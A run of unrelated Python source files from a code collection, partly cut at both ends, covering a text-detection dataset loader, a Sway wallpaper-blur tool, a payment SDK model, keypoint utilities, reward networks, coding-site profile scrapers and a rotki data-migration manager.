return 'The {} is {}'.format(food, effect)
def raise_exception(self):
"""
Just raises an exception.
Raises:
NotImplementedError: Just because.
"""
raise NotImplementedError('Foo!')
# Start the server and run it for 2 minutes.
return Pinger(protocol=2)
def test_server_init(server):
assert server
def test_server_running(server):
def waiter():
stop_at = time.time() + 10
log.info('Looking for svr_running for at least 10 seconds.')
while time.time() < stop_at:
if server.svr_running:
log.info('Found it.')
return True
time.sleep(0.1)
else:
log.info('Not found in time.')
return False
assert not server.svr_running
waiter = Thread(target=waiter)
waiter.start()
server.run(1)
assert waiter
assert not server.svr_running
|
py | 7dfff675f738869f840902d3c3907c3c05f8bd19 | import os
import json
import numpy as np
import cv2
from PIL import Image
from numpy.random.mtrand import rand
import torch
from torch.utils import data
import torchvision.transforms as transforms
import Polygon as plg
import random
import pyclipper
from functools import reduce
from dataset.pan_pp.charset import charset
benchmark_root_path = "../datasets"
benchmark_pretrain_gt_dir = os.path.join(benchmark_root_path, "annotations_separate/full_pretrain")
benchmark_train_gt_dir = os.path.join(benchmark_root_path, "annotations_separate/full_train")
benchmark_val_gt_dir = os.path.join(benchmark_root_path, "annotations_separate/full_val")
benchmark_test_gt_dir = os.path.join(benchmark_root_path, "annotations_separate/full_test")
down_sample_rate = 4
def get_img(img_path, read_type='pil'):
try:
if read_type == 'cv2':
img = cv2.imread(img_path)
if img is None:
print('Cannot read image: %s.' % img_path)
raise
img = img[:, :, [2, 1, 0]]
elif read_type == 'pil':
img = np.array(Image.open(img_path))
except Exception:
print('Cannot read image: %s.' % img_path)
raise
return img
def get_location(box, is_accept_poly):
poly = box['poly']
quad = box['quad']
xywh_rect = box['xywh_rect']
if not is_accept_poly:
poly = []
if len(poly) > 0 and len(poly)%2 == 0:
loc = reduce(lambda x, y: x + y, poly)
elif len(quad) == 8:
loc = quad
elif len(xywh_rect) == 4:
x, y, w, h = xywh_rect
loc = [x, y, x+w, y, x+w, y+h, x, y+h]
else:
loc = None
return loc
def get_ann(img, gt):
h, w = img.shape[0:2]
bboxes = []
words = []
for granularity in gt['annotations']:
for box in gt['annotations'][granularity]:
if box['anno_cat'] != 'standard':
continue
loc = get_location(box, True)
if loc is None:
continue
word = box['transcript']
if box['ignore'] == 1:
words.append('###')
else:
words.append(word)
# bbox = np.array(loc) / ([w * 1.0, h * 1.0] * 4)
bbox = np.array(loc, dtype=np.float)
bbox[::2] /= w * 1.0
bbox[1::2] /= h * 1.0
bboxes.append(bbox)
return bboxes, words
def random_rotate(imgs):
max_angle = 10
angle = random.random() * 2 * max_angle - max_angle
for i in range(len(imgs)):
img = imgs[i]
w, h = img.shape[:2]
rotation_matrix = cv2.getRotationMatrix2D((h / 2, w / 2), angle, 1)
img_rotation = cv2.warpAffine(img,
rotation_matrix, (h, w),
flags=cv2.INTER_NEAREST)
imgs[i] = img_rotation
return imgs
def random_scale(img, min_sizes, max_sizes):
min_size = random.choice(min_sizes)
max_size = random.choice(max_sizes)
h, w = img.shape[:2]
scale = min_size / min(w, h)
if h < w:
neww, newh = scale * w, min_size
else:
neww, newh = min_size, scale * h
if max(neww, newh) > max_size:
scale = max_size / max(neww, newh)
neww = neww * scale
newh = newh * scale
neww = int(round(neww / 32.) * 32.)
newh = int(round(neww / 32.) * 32.)
img = cv2.resize(img, dsize=(neww, newh))
return img
def random_crop_padding(imgs, target_size):
h, w = imgs[0].shape[0:2]
t_w, t_h = target_size
p_w, p_h = target_size
if w == t_w and h == t_h:
return imgs
t_h = t_h if t_h < h else h
t_w = t_w if t_w < w else w
if random.random() > 3.0 / 8.0 and np.max(imgs[1]) > 0:
# make sure to crop the text region
tl = np.min(np.where(imgs[1] > 0), axis=1) - (t_h, t_w)
tl[tl < 0] = 0
br = np.max(np.where(imgs[1] > 0), axis=1) - (t_h, t_w)
br[br < 0] = 0
br[0] = min(br[0], h - t_h)
br[1] = min(br[1], w - t_w)
i = random.randint(tl[0], br[0]) if tl[0] < br[0] else 0
j = random.randint(tl[1], br[1]) if tl[1] < br[1] else 0
else:
i = random.randint(0, h - t_h) if h - t_h > 0 else 0
j = random.randint(0, w - t_w) if w - t_w > 0 else 0
n_imgs = []
for idx in range(len(imgs)):
if len(imgs[idx].shape) == 3:
s3_length = int(imgs[idx].shape[-1])
img = imgs[idx][i:i + t_h, j:j + t_w, :]
img_p = cv2.copyMakeBorder(img,
0,
p_h - t_h,
0,
p_w - t_w,
borderType=cv2.BORDER_CONSTANT,
value=tuple(0
for i in range(s3_length)))
else:
img = imgs[idx][i:i + t_h, j:j + t_w]
img_p = cv2.copyMakeBorder(img,
0,
p_h - t_h,
0,
p_w - t_w,
borderType=cv2.BORDER_CONSTANT,
value=(0, ))
n_imgs.append(img_p)
return n_imgs
def update_word_mask(instance, instance_before_crop, word_mask):
labels = np.unique(instance)
for label in labels:
if label == 0:
continue
ind = instance == label
if np.sum(ind) == 0:
word_mask[label] = 0
continue
ind_before_crop = instance_before_crop == label
# print(np.sum(ind), np.sum(ind_before_crop))
if float(np.sum(ind)) / np.sum(ind_before_crop) > 0.9:
continue
word_mask[label] = 0
return word_mask
def dist(a, b):
return np.linalg.norm((a - b), ord=2, axis=0)
def perimeter(bbox):
peri = 0.0
for i in range(bbox.shape[0]):
peri += dist(bbox[i], bbox[(i + 1) % bbox.shape[0]])
return peri
def shrink(bboxes, rate, max_shr=20):
rate = rate * rate
shrinked_bboxes = []
for bbox in bboxes:
area = plg.Polygon(bbox).area()
peri = perimeter(bbox)
try:
pco = pyclipper.PyclipperOffset()
pco.AddPath(bbox, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)
offset = min(int(area * (1 - rate) / (peri + 0.001) + 0.5),
max_shr)
shrinked_bbox = pco.Execute(-offset)
if len(shrinked_bbox) == 0:
shrinked_bboxes.append(bbox)
continue
shrinked_bbox = np.array(shrinked_bbox)[0]
if shrinked_bbox.shape[0] <= 2:
shrinked_bboxes.append(bbox)
continue
shrinked_bboxes.append(shrinked_bbox)
except Exception:
print('area:', area, 'peri:', peri)
shrinked_bboxes.append(bbox)
return shrinked_bboxes
def get_vocabulary(EOS='EOS', PADDING='PAD', UNKNOWN='UNK'):
voc = list(charset)
voc.append(EOS)
voc.append(PADDING)
voc.append(UNKNOWN)
char2id = dict(zip(voc, range(len(voc))))
id2char = dict(zip(range(len(voc)), voc))
return voc, char2id, id2char
class PAN_PP_BENCHMARK(data.Dataset):
def __init__(self,
split=("train", ),
is_train=True,
is_transform=False,
img_size=None,
min_sizes=(640, 672, 704),
max_sizes=(1600, ),
kernel_scale=0.5,
with_rec=False,
read_type='pil',
report_speed=False):
self.split = split
self.is_train = is_train
self.is_transform = is_transform
self.img_size = img_size if (
img_size is None or isinstance(img_size, tuple)) else (img_size,
img_size)
self.min_sizes = min_sizes
self.max_sizes = max_sizes
self.kernel_scale = kernel_scale
self.with_rec = with_rec
self.read_type = read_type
gt_dirs = []
if "pretrain" in split:
gt_dirs.append(benchmark_pretrain_gt_dir)
if "train" in split:
gt_dirs.append(benchmark_train_gt_dir)
if "val" in split:
gt_dirs.append(benchmark_val_gt_dir)
if "test" in split:
gt_dirs.append(benchmark_test_gt_dir)
if len(gt_dirs) <= 0:
print('Error: split must be pretrain, train, val or test!')
raise
self.gt_paths = []
for gt_dir in gt_dirs:
gt_names = os.listdir(gt_dir)
self.gt_paths += list(map(lambda x: os.path.join(gt_dir, x), gt_names))
if report_speed:
target_size = 3000
extend_scale = (target_size + len(self.gt_paths) - 1) // len(
self.gt_paths)
self.gt_paths = (self.gt_paths * extend_scale)[:target_size]
self.voc, self.char2id, self.id2char = get_vocabulary()
self.max_word_num = 200
self.max_word_len = 32
print('reading type: %s.' % self.read_type)
def __len__(self):
return len(self.gt_paths)
def prepare_train_data(self, index):
gt_path = self.gt_paths[index]
f_gt = open(gt_path, "r")
gt = json.load(f_gt)
f_gt.close()
img = get_img(os.path.join(benchmark_root_path, gt['name']))
bboxes, words = get_ann(img, gt)
if len(bboxes) > self.max_word_num:
bboxes = bboxes[:self.max_word_num]
words = words[:self.max_word_num]
gt_words = np.full((self.max_word_num + 1, self.max_word_len),
self.char2id['PAD'],
dtype=np.int32)
word_mask = np.zeros((self.max_word_num + 1, ), dtype=np.int32)
for i, word in enumerate(words):
if word == '###':
continue
gt_word = np.full((self.max_word_len, ),
self.char2id['PAD'],
dtype=np.int)
for j, char in enumerate(word):
if j > self.max_word_len - 1:
break
if char in self.char2id:
gt_word[j] = self.char2id[char]
else:
gt_word[j] = self.char2id['UNK']
if len(word) > self.max_word_len - 1:
gt_word[-1] = self.char2id['EOS']
else:
gt_word[len(word)] = self.char2id['EOS']
gt_words[i + 1] = gt_word
word_mask[i + 1] = 1
if self.is_transform:
img = random_scale(img, self.min_sizes, self.max_sizes)
gt_instance = np.zeros(img.shape[0:2], dtype='uint8')
training_mask = np.ones(img.shape[0:2], dtype='uint8')
if len(bboxes) > 0:
for i in range(len(bboxes)):
bboxes[i][::2] *= img.shape[1]
bboxes[i][1::2] *= img.shape[0]
bboxes[i] = bboxes[i].astype(np.int32).reshape(-1, 2)
cv2.drawContours(gt_instance, [bboxes[i]], -1, i + 1, -1)
if words[i] == '###':
cv2.drawContours(training_mask, [bboxes[i]], -1, 0, -1)
gt_kernels = []
for rate in [self.kernel_scale]:
gt_kernel = np.zeros(img.shape[0:2], dtype=np.uint8)
kernel_bboxes = shrink(bboxes, rate)
for i in range(len(bboxes)):
cv2.drawContours(gt_kernel, [kernel_bboxes[i]], -1, 1, -1)
gt_kernels.append(gt_kernel)
if self.is_transform:
imgs = [img, gt_instance, training_mask]
imgs.extend(gt_kernels)
imgs = random_rotate(imgs)
gt_instance_before_crop = imgs[1].copy()
imgs = random_crop_padding(imgs, self.img_size)
img, gt_instance, training_mask, gt_kernels = imgs[0], imgs[
1], imgs[2], imgs[3:]
word_mask = update_word_mask(gt_instance, gt_instance_before_crop,
word_mask)
gt_text = gt_instance.copy()
gt_text[gt_text > 0] = 1
gt_kernels = np.array(gt_kernels)
max_instance = np.max(gt_instance)
gt_bboxes = np.zeros((self.max_word_num + 1, 4), dtype=np.int32)
for i in range(1, max_instance + 1):
ind = gt_instance == i
if np.sum(ind) == 0:
continue
points = np.array(np.where(ind)).transpose((1, 0))
tl = np.min(points, axis=0)
br = np.max(points, axis=0) + 1
gt_bboxes[i] = (tl[0], tl[1], br[0], br[1])
img = Image.fromarray(img)
img = img.convert('RGB')
if self.is_transform:
img = transforms.ColorJitter(brightness=32.0 / 255,
saturation=0.5)(img)
img = transforms.ToTensor()(img)
img = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])(img)
gt_text = torch.from_numpy(gt_text).long()
gt_kernels = torch.from_numpy(gt_kernels).long()
training_mask = torch.from_numpy(training_mask).long()
gt_instance = torch.from_numpy(gt_instance).long()
gt_bboxes = torch.from_numpy(gt_bboxes).long()
gt_words = torch.from_numpy(gt_words).long()
word_mask = torch.from_numpy(word_mask).long()
data = dict(
imgs=img,
gt_texts=gt_text,
gt_kernels=gt_kernels,
training_masks=training_mask,
gt_instances=gt_instance,
gt_bboxes=gt_bboxes,
)
if self.with_rec:
data.update(dict(gt_words=gt_words, word_masks=word_mask))
return data
def prepare_test_data(self, index):
gt_path = self.gt_paths[index]
f_gt = open(gt_path, "r")
gt = json.load(f_gt)
f_gt.close()
img = get_img(os.path.join(benchmark_root_path, gt['name']))
img_meta = dict(org_img_size=np.array(img.shape[:2]))
img = random_scale(img, self.min_sizes, self.max_sizes)
img_meta.update(dict(img_size=np.array(img.shape[:2])))
img = Image.fromarray(img)
img = img.convert('RGB')
img = transforms.ToTensor()(img)
img = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])(img)
data = dict(imgs=img, img_metas=img_meta)
return data
def __getitem__(self, index):
if self.is_train:
return self.prepare_train_data(index)
else:
return self.prepare_test_data(index)
|
py | 7dfff70983b49f8d0d640b9ff76d6e39e47e41b2 | import multiprocessing
import subprocess
import filecmp
import shutil
import hashlib
import logging
import os.path
import i3ipc
from swayblur import paths
from swayblur.output import Output
def genBlurredImage(inputPath: str, outputPath: str, blurLevel: int) -> None:
try:
subprocess.run(['convert', inputPath, '-blur', '0x%d' % blurLevel, outputPath])
except FileNotFoundError:
logging.error('Could not create blurred version of wallpaper, ensure imagemagick is installed')
exit()
logging.info('Generated image %s' % outputPath)
def verifyWallpaperCache(wallpaperPath: str, wallpaperHash: str) -> bool:
cachedWallpaper = paths.cachedImagePath(wallpaperPath, wallpaperHash)
if paths.exists(cachedWallpaper) and filecmp.cmp(wallpaperPath, cachedWallpaper):
logging.info('wallpaper %s is cached as %s' % (wallpaperPath, cachedWallpaper))
return True
logging.info('wallpaper %s added to the cache as %s' % (wallpaperPath, cachedWallpaper))
shutil.copy(wallpaperPath, cachedWallpaper)
return False
class BlurManager:
def __init__(self, outputConfigs: dict, blurStrength: int, animationDuration: int) -> None:
self.SWAY = i3ipc.Connection()
self.outputs = {}
animationFrames = [
(i + 1) * (blurStrength // animationDuration) for i in range(animationDuration)
]
# create an output object for each output in the configuration
for name in outputConfigs:
outputCfg = outputConfigs[name]
outputWallpaper = os.path.expanduser(
os.path.expandvars(outputCfg['image'])
)
if not outputWallpaper: # if output has no wallpaper
self.outputs[name] = Output(name, '', [], {})
continue
imageHash = hashlib.md5(outputWallpaper.encode()).hexdigest()
cachedImage = paths.cachedImagePath(outputWallpaper, imageHash)
self.outputs[name] = Output(
name,
cachedImage,
[paths.framePath(imageHash, frame) for frame in animationFrames],
{
'filter': outputCfg['filter'] ,
'anchor': outputCfg['anchor'],
'scaling-mode': outputCfg['scaling-mode'],
}
)
# check if new wallpaper must be generated
if not verifyWallpaperCache(outputWallpaper, imageHash):
print('Generating blurred wallpaper frames')
print('This may take a minute...')
with multiprocessing.Pool() as pool:
pool.starmap(
genBlurredImage,
[[cachedImage, paths.framePath(imageHash, frame), frame] for frame in animationFrames]
)
print('Blurred wallpaper generated for %s' % name)
else:
print('Blurred wallpaper exists for %s' % name)
def start(self) -> None:
# initially blur populated workspaces
for workspace in self.SWAY.get_workspaces():
if workspace.visible and workspace.ipc_data['focus']:
self.outputs[workspace.ipc_data['output']].blur()
print("Listening...")
self.SWAY.on(i3ipc.Event.WINDOW_MOVE, self.handleMove)
self.SWAY.on(i3ipc.Event.WINDOW_NEW, self.handleNew)
self.SWAY.on(i3ipc.Event.WINDOW_CLOSE, self.handleClose)
self.SWAY.on(i3ipc.Event.WORKSPACE_FOCUS, self.handleFocus)
self.SWAY.main()
def handleMove(self, _: i3ipc.Connection, event: i3ipc.Event) -> None:
container = self.SWAY.get_tree().find_by_id(event.ipc_data['container']['id'])
containerOutput = ''
focusedContainer = self.SWAY.get_tree().find_focused()
focusedOutput = focusedContainer.workspace().ipc_data['output']
try:
containerOutput = container.workspace().ipc_data['output']
except KeyError: # case when moved to scratchpad, deal with focused output
if focusedContainer == focusedContainer.workspace(): # if workspace empty
self.outputs[focusedOutput].unblur()
return
except AttributeError: # case where a previously scratchpadded window is closed
# it doesn't make sense that closing a previously scratchpadded window
# would be a WINDOW_MOVE event to me either, but it is what it is
return
# window moved to a workspace on a different output
if container != focusedContainer:
self.outputs[containerOutput].blur()
if focusedContainer == focusedContainer.workspace(): # if workspace empty
self.outputs[focusedOutput].unblur()
# window moved to a new workspace on same output
elif container == container.workspace(): # if workspace is empty
self.outputs[containerOutput].unblur()
def handleNew(self, _: i3ipc.Connection, event: i3ipc.Event) -> None:
container = self.SWAY.get_tree().find_by_id(event.ipc_data['container']['id'])
workspace = container.workspace()
self.outputs[workspace.ipc_data['output']].blur()
def handleClose(self, _: i3ipc.Connection, _event: i3ipc.Event) -> None:
container = self.SWAY.get_tree().find_focused()
workspace = container.workspace()
if container == workspace: # if workspace is empty
self.outputs[workspace.ipc_data['output']].unblur()
def handleFocus(self, _: i3ipc.Connection, _event: i3ipc.Event) -> None:
container = self.SWAY.get_tree().find_focused()
workspace = container.workspace()
if container == workspace: # if workspace is empty
self.outputs[workspace.ipc_data['output']].unblur()
else:
self.outputs[workspace.ipc_data['output']].blur()
|
py | 7dfff8504ce0d4a7f32f2a726800d45b6a9eaf50 | # -*- coding: utf-8 -*-
"""
pagarmeapisdk
This file was automatically generated by APIMATIC v3.0 (
https://www.apimatic.io ).
"""
from pagarmeapisdk.models.create_cancel_charge_split_rules_request import CreateCancelChargeSplitRulesRequest
from pagarmeapisdk.models.create_split_request import CreateSplitRequest
class CreateCancelChargeRequest(object):
"""Implementation of the 'CreateCancelChargeRequest' model.
Request for canceling a charge.
Attributes:
amount (int): The amount that will be canceled.
split_rules (list of CreateCancelChargeSplitRulesRequest): The split
rules request
split (list of CreateSplitRequest): Splits
operation_reference (string): TODO: type description here.
"""
# Create a mapping from Model property names to API property names
_names = {
"operation_reference": 'operation_reference',
"amount": 'amount',
"split_rules": 'split_rules',
"split": 'split'
}
def __init__(self,
operation_reference=None,
amount=None,
split_rules=None,
split=None):
"""Constructor for the CreateCancelChargeRequest class"""
# Initialize members of the class
self.amount = amount
self.split_rules = split_rules
self.split = split
self.operation_reference = operation_reference
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object
as obtained from the deserialization of the server's response. The
keys MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
operation_reference = dictionary.get('operation_reference')
amount = dictionary.get('amount')
split_rules = None
if dictionary.get('split_rules') is not None:
split_rules = [CreateCancelChargeSplitRulesRequest.from_dictionary(x) for x in dictionary.get('split_rules')]
split = None
if dictionary.get('split') is not None:
split = [CreateSplitRequest.from_dictionary(x) for x in dictionary.get('split')]
# Return an object of this model
return cls(operation_reference,
amount,
split_rules,
split)
|
py | 7dfff8a7544122efaa1ca68919993e43e3f54c27 | import torch
# transpose
FLIP_LEFT_RIGHT = 0
FLIP_TOP_BOTTOM = 1
class Keypoints(object):
def __init__(self, keypoints, size, mode=None):
# FIXME remove check once we have better integration with device
# in my version this would consistently return a CPU tensor
device = keypoints.device if isinstance(keypoints, torch.Tensor) else torch.device('cpu')
keypoints = torch.as_tensor(keypoints, dtype=torch.float32, device=device)
num_keypoints = keypoints.shape[0]
if num_keypoints:
keypoints = keypoints.view(num_keypoints, -1, 3)
# TODO should I split them?
# self.visibility = keypoints[..., 2]
self.keypoints = keypoints# [..., :2]
self.size = size
self.mode = mode
self.extra_fields = {}
def crop(self, box):
raise NotImplementedError()
def resize(self, size, *args, **kwargs):
ratios = tuple(float(s) / float(s_orig) for s, s_orig in zip(size, self.size))
ratio_w, ratio_h = ratios
resized_data = self.keypoints.clone()
resized_data[..., 0] *= ratio_w
resized_data[..., 1] *= ratio_h
keypoints = type(self)(resized_data, size, self.mode)
for k, v in self.extra_fields.items():
keypoints.add_field(k, v)
return keypoints
def transpose(self, method):
if method not in (FLIP_LEFT_RIGHT,):
raise NotImplementedError(
"Only FLIP_LEFT_RIGHT implemented")
flip_inds = type(self).FLIP_INDS
flipped_data = self.keypoints[:, flip_inds]
width = self.size[0]
TO_REMOVE = 1
# Flip x coordinates
flipped_data[..., 0] = width - flipped_data[..., 0] - TO_REMOVE
# Maintain COCO convention that if visibility == 0, then x, y = 0
inds = flipped_data[..., 2] == 0
flipped_data[inds] = 0
keypoints = type(self)(flipped_data, self.size, self.mode)
for k, v in self.extra_fields.items():
keypoints.add_field(k, v)
return keypoints
def to(self, *args, **kwargs):
keypoints = type(self)(self.keypoints.to(*args, **kwargs), self.size, self.mode)
for k, v in self.extra_fields.items():
if hasattr(v, "to"):
v = v.to(*args, **kwargs)
keypoints.add_field(k, v)
return keypoints
def __getitem__(self, item):
keypoints = type(self)(self.keypoints[item], self.size, self.mode)
for k, v in self.extra_fields.items():
keypoints.add_field(k, v[item])
return keypoints
def add_field(self, field, field_data):
self.extra_fields[field] = field_data
def get_field(self, field):
return self.extra_fields[field]
def __repr__(self):
s = self.__class__.__name__ + '('
s += 'num_instances={}, '.format(len(self.keypoints))
s += 'image_width={}, '.format(self.size[0])
s += 'image_height={})'.format(self.size[1])
return s
def _create_flip_indices(names, flip_map):
full_flip_map = flip_map.copy()
full_flip_map.update({v: k for k, v in flip_map.items()})
flipped_names = [i if i not in full_flip_map else full_flip_map[i] for i in names]
flip_indices = [names.index(i) for i in flipped_names]
return torch.tensor(flip_indices)
class PersonKeypoints(Keypoints):
NAMES = [
'nose',
'left_eye',
'right_eye',
'left_ear',
'right_ear',
'left_shoulder',
'right_shoulder',
'left_elbow',
'right_elbow',
'left_wrist',
'right_wrist',
'left_hip',
'right_hip',
'left_knee',
'right_knee',
'left_ankle',
'right_ankle'
]
FLIP_MAP = {
'left_eye': 'right_eye',
'left_ear': 'right_ear',
'left_shoulder': 'right_shoulder',
'left_elbow': 'right_elbow',
'left_wrist': 'right_wrist',
'left_hip': 'right_hip',
'left_knee': 'right_knee',
'left_ankle': 'right_ankle'
}
# TODO this doesn't look great
PersonKeypoints.FLIP_INDS = _create_flip_indices(PersonKeypoints.NAMES, PersonKeypoints.FLIP_MAP)
def kp_connections(keypoints):
kp_lines = [
[keypoints.index('left_eye'), keypoints.index('right_eye')],
[keypoints.index('left_eye'), keypoints.index('nose')],
[keypoints.index('right_eye'), keypoints.index('nose')],
[keypoints.index('right_eye'), keypoints.index('right_ear')],
[keypoints.index('left_eye'), keypoints.index('left_ear')],
[keypoints.index('right_shoulder'), keypoints.index('right_elbow')],
[keypoints.index('right_elbow'), keypoints.index('right_wrist')],
[keypoints.index('left_shoulder'), keypoints.index('left_elbow')],
[keypoints.index('left_elbow'), keypoints.index('left_wrist')],
[keypoints.index('right_hip'), keypoints.index('right_knee')],
[keypoints.index('right_knee'), keypoints.index('right_ankle')],
[keypoints.index('left_hip'), keypoints.index('left_knee')],
[keypoints.index('left_knee'), keypoints.index('left_ankle')],
[keypoints.index('right_shoulder'), keypoints.index('left_shoulder')],
[keypoints.index('right_hip'), keypoints.index('left_hip')],
]
return kp_lines
PersonKeypoints.CONNECTIONS = kp_connections(PersonKeypoints.NAMES)
# TODO make this nicer, this is a direct translation from C2 (but removing the inner loop)
def keypoints_to_heat_map(keypoints, rois, heatmap_size):
if rois.numel() == 0:
return rois.new().long(), rois.new().long()
offset_x = rois[:, 0]
offset_y = rois[:, 1]
scale_x = heatmap_size / (rois[:, 2] - rois[:, 0])
scale_y = heatmap_size / (rois[:, 3] - rois[:, 1])
offset_x = offset_x[:, None]
offset_y = offset_y[:, None]
scale_x = scale_x[:, None]
scale_y = scale_y[:, None]
x = keypoints[..., 0]
y = keypoints[..., 1]
x_boundary_inds = x == rois[:, 2][:, None]
y_boundary_inds = y == rois[:, 3][:, None]
x = (x - offset_x) * scale_x
x = x.floor().long()
y = (y - offset_y) * scale_y
y = y.floor().long()
x[x_boundary_inds] = heatmap_size - 1
y[y_boundary_inds] = heatmap_size - 1
valid_loc = (x >= 0) & (y >= 0) & (x < heatmap_size) & (y < heatmap_size)
vis = keypoints[..., 2] > 0
valid = (valid_loc & vis).long()
lin_ind = y * heatmap_size + x
heatmaps = lin_ind * valid
return heatmaps, valid
|
py | 7dfff8ca3a5a7181b71c674652286f4fff0c3144 | import numpy as np
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
class TrexNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(4, 16, 7, stride=3)
self.conv2 = nn.Conv2d(16, 16, 5, stride=2)
self.conv3 = nn.Conv2d(16, 16, 3, stride=1)
self.conv4 = nn.Conv2d(16, 16, 3, stride=1)
self.fc1 = nn.Linear(784, 64)
self.fc2 = nn.Linear(64, 1)
def forward(self, obs):
'''calculate cumulative return of trajectory'''
x = obs.permute(0,3,1,2) #get into NCHW format
#compute forward pass of reward network
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = x.view(-1, 784)
#x = x.view(-1, 1936)
x = F.relu(self.fc1(x))
#r = torch.tanh(self.fc2(x)) #clip reward?
x = self.fc2(x)
return x
class MediumNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(4, 32, 5, stride=2)
self.conv2 = nn.Conv2d(32, 32, 5, stride=2)
self.conv3 = nn.Conv2d(32, 32, 3, stride=1)
self.conv4 = nn.Conv2d(32, 32, 3, stride=1)
self.fc1 = nn.Linear(6272, 1024)
#self.fc1 = nn.Linear(1936,64)
self.fc2 = nn.Linear(1024, 256)
self.fc3 = nn.Linear(256,1)
def forward(self, obs):
'''feed forward through network to get logits for binary reward classification'''
x = obs.permute(0,3,1,2) #get into NCHW format
#compute forward pass of reward network
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = x.view(-1, 6272)
#x = x.view(-1, 1936)
x = F.relu(self.fc1(x))
#r = torch.tanh(self.fc2(x)) #clip reward?
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
#Machado ICLR 2018 paper net
class BiggerNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(4, 64, 5, stride=2)
self.conv2 = nn.Conv2d(64, 64, 5, stride=2)
self.conv3 = nn.Conv2d(64, 64, 3, stride=1)
self.conv4 = nn.Conv2d(64, 64, 3, stride=1)
self.fc1 = nn.Linear(12544, 2048)
#self.fc1 = nn.Linear(1936,64)
self.fc2 = nn.Linear(2048, 512)
self.fc3 = nn.Linear(512,1)
def forward(self, obs):
'''feed forward through network to get logits for binary reward classification'''
x = obs.permute(0,3,1,2) #get into NCHW format
#compute forward pass of reward network
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = x.view(-1, 12544)
#x = x.view(-1, 1936)
x = F.relu(self.fc1(x))
#r = torch.tanh(self.fc2(x)) #clip reward?
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
|
py | 7dfff8cacdf308a23afada0d8073c92c2f77d3fc | import urllib.request
import codecs
import json
from bs4 import BeautifulSoup
import requests
def uva(username):
# get the number of solved problems
reader = codecs.getreader("utf-8")
uid = str(reader(urllib.request.urlopen("https://uhunt.onlinejudge.org/api/uname2uid/"+username)).read())
submissions = urllib.request.urlopen("https://uhunt.onlinejudge.org/api/subs-user/"+uid)
obj = json.load(reader(submissions))
totalsolved = 0
solvedSet = set()
for i in obj['subs']:
if i[2] == 90 and i[0] not in solvedSet:
solvedSet.add(i[0])
return len(solvedSet)
def firecode(userid):
url = "https://www.firecode.io/pages/profile/"
content = requests.get(url+userid).content
soup = BeautifulSoup(content, "lxml")
table = soup.find("table", {"id": "problem-history"}).tbody
solvedSet = set()
for tr in table.find_all("tr"):
problem = ""
solved = False
a = tr.find_all('td')[1].find_all('a')
for i in a:
problem = i.text.strip()
b = tr.find_all('td')[2].find_all("img")
if not b:
solved = True
if solved:
solvedSet.add(problem)
return len(solvedSet)
def leetcode(username):
url = "https://leetcode.com/"
content = requests.get(url+username).content
soup = BeautifulSoup(content, "lxml")
i = soup.find("i",{"class":"fa fa-question fa-lg fa-fw"}).parent.find_all("span")
count = []
for e in i:
count = e.text.strip().split(" / ")
return int(count[0])
|
py | 7dfff8d66cb56225f5bc563fa214fc798edbfce3 | import logging
from typing import TYPE_CHECKING, Any, Callable, Dict, NamedTuple, Optional
from rotkehlchen.data_migrations.migrations.migration_1 import data_migration_1
from rotkehlchen.data_migrations.migrations.migration_2 import data_migration_2
from rotkehlchen.data_migrations.migrations.migration_3 import data_migration_3
from rotkehlchen.logging import RotkehlchenLogsAdapter
if TYPE_CHECKING:
from rotkehlchen.rotkehlchen import Rotkehlchen
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
class MigrationRecord(NamedTuple):
version: int
function: Callable
kwargs: Optional[Dict[str, Any]] = None
MIGRATION_LIST = [
MigrationRecord(version=1, function=data_migration_1),
MigrationRecord(version=2, function=data_migration_2),
MigrationRecord(version=3, function=data_migration_3),
]
LAST_DATA_MIGRATION = len(MIGRATION_LIST)
class DataMigrationManager:
def __init__(self, rotki: 'Rotkehlchen'):
self.rotki = rotki
def maybe_migrate_data(self) -> None:
settings = self.rotki.data.db.get_settings()
current_migration = settings.last_data_migration
for migration in MIGRATION_LIST:
if current_migration < migration.version:
if self._perform_migration(migration) is False:
break # a migration failed -- no point continuing
current_migration += 1
log.debug(f'Successfuly applied migration {current_migration}')
self.rotki.data.db.conn.cursor().execute(
'INSERT OR REPLACE INTO settings(name, value) VALUES(?, ?)',
('last_data_migration', current_migration),
)
self.rotki.data.db.conn.commit()
def _perform_migration(self, migration: MigrationRecord) -> bool:
"""Performs a single data migration and returns boolean for success/failure"""
try:
kwargs = migration.kwargs if migration.kwargs is not None else {}
migration.function(rotki=self.rotki, **kwargs)
except BaseException as e: # lgtm[py/catch-base-exception]
error = f'Failed to run soft data migration to version {migration.version} due to {str(e)}' # noqa: E501
self.rotki.msg_aggregator.add_error(error)
return False
return True
|
py | 7dfff92cb5bc7779b923fd27641999225092d3ac |
from __future__ import absolute_import, division, print_function
import os
import skimage.transform
import numpy as np
import PIL.Image as pil
from path import Path
import matplotlib.pyplot as plt
from .mono_dataset import MonoDataset
class MCDataset_old(MonoDataset):
def __init__(self,*args,**kwargs):
super(MCDataset,self).__init__(*args,**kwargs)
#self.full_res_shape = [1920,1080]#
#FOV = 35d
#960 = 1920/2
#960/fx = tan 35 =0.7-> fx = 1371
# 1920 * k[0] = 1371-> k0 = 0.714
# 1080 * k[1 ]= 1371 -> k1 = 1.27
#self.K=np.array([[0.714, 0, 0.5, 0],
# [0, 1.27, 0.5, 0],
# [0, 0, 1, 0],
